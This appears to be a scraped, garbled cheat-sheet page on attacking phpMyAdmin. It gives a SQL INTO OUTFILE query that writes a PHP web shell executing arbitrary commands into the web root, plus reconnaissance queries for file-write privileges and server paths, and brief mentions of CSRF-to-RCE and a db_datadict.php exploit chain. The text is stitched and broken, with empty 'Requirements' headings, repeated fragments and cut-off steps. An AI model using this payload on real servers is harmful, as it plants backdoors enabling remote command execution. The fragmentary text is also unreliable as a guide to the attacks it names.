Phpmyadmin Hacktricks 〈TRUSTED〉

Cross-Site Request Forgery can modify the server’s configuration, leading to RCE.

The oldest trick: write a PHP shell into the web root. phpmyadmin hacktricks

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE "/var/www/html/shell.php"

Requirements:

Check secure_file_priv:

SHOW VARIABLES LIKE "secure_file_priv";

Exploits ?target=db_datadict.php chained with a crafted SQL query. Steps: Requirements:

Once inside, the attacker checks SELECT @@version, SELECT @@secure_file_priv, and SHOW VARIABLES LIKE 'basedir'. the attacker checks SELECT @@version